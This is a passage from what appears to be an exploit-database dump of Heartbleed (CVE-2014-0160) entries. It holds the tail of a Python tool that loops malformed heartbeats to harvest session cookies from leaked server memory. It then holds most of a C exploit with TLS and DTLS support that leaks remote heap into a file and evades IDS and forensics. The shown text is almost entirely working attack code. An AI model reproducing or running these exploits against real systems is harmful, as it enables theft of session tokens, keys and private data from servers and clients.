if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = 
string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://0day.today/exploit/22118", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-13T03:43:15", "description": "This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and written to a file to annoy IDS/forensics. 
The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "cvss3": {}, "published": "2014-04-24T00:00:00", "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and written to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks up to 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. 
Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* 
http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include 
<netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] 
cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] 
cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] 
FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n 
return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = 
malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. 
STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n 
break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n 
}\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n 
goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n 